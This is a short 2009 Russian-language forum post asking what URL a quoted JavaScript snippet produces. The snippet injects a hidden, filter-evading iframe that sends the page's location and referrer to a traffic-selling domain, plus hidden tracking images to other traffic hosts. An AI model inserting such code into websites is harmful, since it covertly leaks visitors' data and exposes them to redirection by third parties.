Показать сообщение отдельно

  #8  
Старый 18.01.2009, 19:05
telas
Новичок
Регистрация: 17.09.2008
Сообщений: 4
Провел на форуме:
105082

Репутация: 0
По умолчанию

Помогите пожалуйста с кодом
Цитата:
var html = '';
html += '<ifr' + 'ame src="http://go.richtraffic.ru/direct.php';
html += '?url=' + encodeURIComponent(document.location);
html += '&ref=' + encodeURIComponent(document.referrer);
html += '&frm=' + self.parent.frames.length;
html += '&nc=' + Math.random() + '" style="display:none;">';
html += '</ifr' + 'ame>';
document.write(html);

document.write("<img src='http://trafficshop.biz/ts/in.cgi?richtraffic' style='display:none'>");
//document.write("<img src='http://iframepay.com/tds/tds.php?id=1428&url=" + encodeURIComponent(document.location) + "' style='display:none'>");
какая тут ссылка на выходе получится?
 
Ответить с цитированием